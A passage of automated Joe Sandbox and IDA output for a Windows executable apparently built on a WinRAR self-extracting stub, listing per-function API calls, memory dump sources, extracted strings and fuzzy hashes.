                                                                                        • GetCommandLineW.KERNEL32 ref: 0037BBEA
                                                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0037BC47
                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 0037BC6F
                                                                                        • Sleep.KERNEL32(00000064), ref: 0037BCB9
                                                                                        • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0037BCE2
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0037BCEB
                                                                                        • _swprintf.LIBCMT ref: 0037BD1E
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037BD7D
                                                                                        • SetDlgItemTextW.USER32(?,00000065,003935F4), ref: 0037BD94
                                                                                        • GetDlgItem.USER32(?,00000065), ref: 0037BD9D
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0037BDAC
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0037BDBB
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037BE68
                                                                                        • _wcslen.LIBCMT ref: 0037BEBE
                                                                                        • _swprintf.LIBCMT ref: 0037BEE8
                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 0037BF32
                                                                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0037BF4C
                                                                                        • GetDlgItem.USER32(?,00000068), ref: 0037BF55
                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0037BF6B
                                                                                        • GetDlgItem.USER32(?,00000066), ref: 0037BF85
                                                                                        • SetWindowTextW.USER32(00000000,003AA472), ref: 0037BFA7
                                                                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0037C007
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037C01A
                                                                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0037C0BD
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 0037C197
                                                                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0037C1D9
                                                                                          • Part of subcall function 0037C73F: __EH_prolog.LIBCMT ref: 0037C744
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037C1FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<7$STARTDLG$^7$__tmp_rar_sfx_access_check_%u$h7$winrarsfxmappingfile.tmp$Q9
                                                                                        • API String ID: 3829768659-323668307
                                                                                        • Opcode ID: 21991e7c6e264eb7c0be7f2e1aa7e3f19b4c8244087bdece1e6280a7ec1a6388
                                                                                        • Instruction ID: 53649dc89d40add5bffb0df94f90567610c9d24bc83108ed043cb3b3b86269d6
                                                                                        • Opcode Fuzzy Hash: 21991e7c6e264eb7c0be7f2e1aa7e3f19b4c8244087bdece1e6280a7ec1a6388
                                                                                        • Instruction Fuzzy Hash: 4942D671944244BEEB33AB64DC4AFBE7B7CAB06704F04C159F649AA1D2CB785E44CB21
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 0037087C
                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0037088E
                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003708BF
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00370B69
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00370B83
                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00370B93
                                                                                        • ReadFile.KERNEL32(00000000,?,00007FFE,|<9,00000000), ref: 00370BB1
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00370C09
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00370C1E
                                                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<9,?,00000000,?,00000800), ref: 00370C72
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,|<9,00000800,?,00000000,?,00000800), ref: 00370C9C
                                                                                        • GetFileAttributesW.KERNEL32(?,?,D=9,00000800), ref: 00370CD8
                                                                                          • Part of subcall function 0037081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
                                                                                          • Part of subcall function 0037081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858
                                                                                        • _swprintf.LIBCMT ref: 00370D4A
                                                                                        • _swprintf.LIBCMT ref: 00370D96
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                        • AllocConsole.KERNEL32 ref: 00370D9E
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00370DA8
                                                                                        • AttachConsole.KERNEL32(00000000), ref: 00370DAF
                                                                                        • _wcslen.LIBCMT ref: 00370DC4
                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00370DD5
                                                                                        • WriteConsoleW.KERNEL32(00000000), ref: 00370DDC
                                                                                        • Sleep.KERNEL32(00002710), ref: 00370DE7
                                                                                        • FreeConsole.KERNEL32 ref: 00370DED
                                                                                        • ExitProcess.KERNEL32 ref: 00370DF5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                        • String ID: (=9$,<9$,@9$0?9$0A9$4B9$8>9$D=9$DXGIDebug.dll$H?9$H@9$HA9$P>9$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=9$`@9$d?9$dA9$dwmapi.dll$h=9$h>9$kernel32$uxtheme.dll$|<9$|?9$|@9$<9$>9$?9$@9$A9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 0037C744
                                                                                          • Part of subcall function 0037B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0037B3FB
                                                                                          • Part of subcall function 0037AF98: _wcschr.LIBVCRUNTIME ref: 0037B033
                                                                                        • _wcslen.LIBCMT ref: 0037CA0A
                                                                                        • _wcslen.LIBCMT ref: 0037CA13
                                                                                        • SetWindowTextW.USER32(?,?), ref: 0037CA71
                                                                                        • _wcslen.LIBCMT ref: 0037CAB3
                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 0037CBFB
                                                                                        • GetDlgItem.USER32(?,00000066), ref: 0037CC36
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0037CC46
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,003AA472), ref: 0037CC54
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0037CC7F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                        • String ID: %s.%d.tmp$<br>$<7$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$7
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 0036DA70
                                                                                        • _wcschr.LIBVCRUNTIME ref: 0036DA91
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0036DAAC
                                                                                          • Part of subcall function 0036C29A: _wcslen.LIBCMT ref: 0036C2A2
                                                                                          • Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0
                                                                                          • Part of subcall function 00371B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0036BAE9,00000000,?,?,?,00010420), ref: 00371BA0
                                                                                        • _wcslen.LIBCMT ref: 0036DDE9
                                                                                        • __fprintf_l.LIBCMT ref: 0036DF1C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0037B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
                                                                                          • Part of subcall function 0037B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
                                                                                          • Part of subcall function 0037B568: IsDialogMessageW.USER32(00010420,?), ref: 0037B59E
                                                                                          • Part of subcall function 0037B568: TranslateMessage.USER32(?), ref: 0037B5AC
                                                                                          • Part of subcall function 0037B568: DispatchMessageW.USER32(?), ref: 0037B5B6
                                                                                        • GetDlgItem.USER32(00000068,003BFCB8), ref: 0037D4E8
                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,0037AF07,00000001,?,?,0037B7B9,0039506C,003BFCB8,003BFCB8,00001000,00000000,00000000), ref: 0037D510
                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037D51B
                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,003935F4), ref: 0037D529
                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D53F
                                                                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0037D559
                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D59D
                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0037D5AB
                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D5BA
                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D5E1
                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,003943F4), ref: 0037D5F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                        • String ID: \
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 0037D7AE
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 0037D8DE
                                                                                        • ShowWindow.USER32(?,00000000), ref: 0037D91D
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 0037D959
                                                                                        • CloseHandle.KERNEL32(?), ref: 0037D97F
                                                                                        • ShowWindow.USER32(?,00000001), ref: 0037D9E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                        • String ID: .exe$.inf$PDu<7$h7$r7
                                                                                        • API String ID: 36480843-3959991556
                                                                                        • Opcode ID: 21af76e1ed4af309871876f975407c21d9e049cd621d444558af0a93592ec35c
                                                                                        • Instruction ID: 2a53ffed54ae0b84d71a8fb339aa674a5297f230fa86ac6a62655841f189c8c6
                                                                                        • Opcode Fuzzy Hash: 21af76e1ed4af309871876f975407c21d9e049cd621d444558af0a93592ec35c
                                                                                        • Instruction Fuzzy Hash: 8951D471104380AADB339B24D844BABBBF8AF86744F05841EF6C997291E7799984CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00383C35,00000000,00000FA0,003C2088,00000000,?,00383D60,00000004,InitializeCriticalSectionEx,00396394,InitializeCriticalSectionEx,00000000), ref: 00383C03
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID: api-ms-$c*8
                                                                                        • API String ID: 3664257935-3792289197
                                                                                        • Opcode ID: 63e1b4593d26f7df8fdfe3a12b41230368f583d0fa522831b0f48099dfbc7e58
                                                                                        • Instruction ID: 3d1df055f88694fcf842c7aee3e450bad10a4096b04ce67b0273ae878f51e7ba
                                                                                        • Opcode Fuzzy Hash: 63e1b4593d26f7df8fdfe3a12b41230368f583d0fa522831b0f48099dfbc7e58
                                                                                        • Instruction Fuzzy Hash: 5511CAB5A46321ABCF23AB689C41B9937689F01B70F1601A1E955FB390E771EF0087D1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003857FB,003857FB,?,?,?,0038ABAC,00000001,00000001,2DE85006), ref: 0038A9B5
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0038ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0038AA3B
                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0038AB35
                                                                                        • __freea.LIBCMT ref: 0038AB42
                                                                                          • Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00384286,?,0000015D,?,?,?,?,00385762,000000FF,00000000,?,?), ref: 00388E38
                                                                                        • __freea.LIBCMT ref: 0038AB4B
                                                                                        • __freea.LIBCMT ref: 0038AB70
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1414292761-0
                                                                                        • Opcode ID: ddc19426935c2145ac9c2a6bff217af6bd656638abd736c4ca2bf4949adbfcf2
                                                                                        • Instruction ID: 80b8e0f9efdbba632a690e0be620f6973ff0bc4b403824fe2c8b463968dff077
                                                                                        • Opcode Fuzzy Hash: ddc19426935c2145ac9c2a6bff217af6bd656638abd736c4ca2bf4949adbfcf2
                                                                                        • Instruction Fuzzy Hash: 2051E372600B16ABFB27AF64CC41EBBB7AAEB40710F1646AAFD04DA140DB34DD50D791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0037081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
                                                                                          • Part of subcall function 0037081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858
                                                                                        • OleInitialize.OLE32(00000000), ref: 0037AC2F
                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0037AC66
                                                                                        • SHGetMalloc.SHELL32(003A8438), ref: 0037AC70
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                        • String ID: riched20.dll$3To
                                                                                        • API String ID: 3498096277-2168385784
                                                                                        • Opcode ID: 0d65707e230e1414827d31f594afdfcdbb7252473b9fa813cfea3c3390f4c12f
                                                                                        • Instruction ID: db1a4af10e01ae9713f566a3de35d433c9a3e15537922988a7885103ea9e13db
                                                                                        • Opcode Fuzzy Hash: 0d65707e230e1414827d31f594afdfcdbb7252473b9fa813cfea3c3390f4c12f
                                                                                        • Instruction Fuzzy Hash: 3AF01DB5D00219ABCB11AFAAD849DEFFFFCEF85700F00815AE415E2241DBB856058FA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00367760,?,00000005,?,00000011), ref: 0036995F
                                                                                        • GetLastError.KERNEL32(?,?,00367760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0036996C
                                                                                        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00367760,?,00000005,?), ref: 003699A2
                                                                                        • GetLastError.KERNEL32(?,?,00367760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003699AA
                                                                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00367760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003699F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreateErrorLast$Time
                                                                                        • String ID:
                                                                                        • API String ID: 1999340476-0
                                                                                        • Opcode ID: 116af476fbd6ca01f4b4c243ae4706c7c92dc991c2aa939ee4670df612c3f74b
                                                                                        • Instruction ID: 73e231b0c3446b0a6055954c9f7d091fe51d259c73c9923745a36b87ac5a5ced
                                                                                        • Opcode Fuzzy Hash: 116af476fbd6ca01f4b4c243ae4706c7c92dc991c2aa939ee4670df612c3f74b
                                                                                        • Instruction Fuzzy Hash: BC315730544745AFE7329F20CC46BEABBDCBB05320F214B1EF9A1962C4D3B5A954CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
                                                                                        • IsDialogMessageW.USER32(00010420,?), ref: 0037B59E
                                                                                        • TranslateMessage.USER32(?), ref: 0037B5AC
                                                                                        • DispatchMessageW.USER32(?), ref: 0037B5B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 1266772231-0
                                                                                        • Opcode ID: 5b250027098fdd805917fa6484cd89a6ce52c8267cd3e281c05b3407d4fb288e
                                                                                        • Instruction ID: 90fc68871fbf0b2a5b372c8a7bdc0d7b76696edab0c721987caa6ce8f69f7140
                                                                                        • Opcode Fuzzy Hash: 5b250027098fdd805917fa6484cd89a6ce52c8267cd3e281c05b3407d4fb288e
                                                                                        • Instruction Fuzzy Hash: 0EF09B72E01129BBCB21ABE6DC4CDEBBFBCEE05755B408415B51AD2050EB78E605CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000050), ref: 0037ABC2
                                                                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 0037ABF9
                                                                                          • Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1
                                                                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0037ABE9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
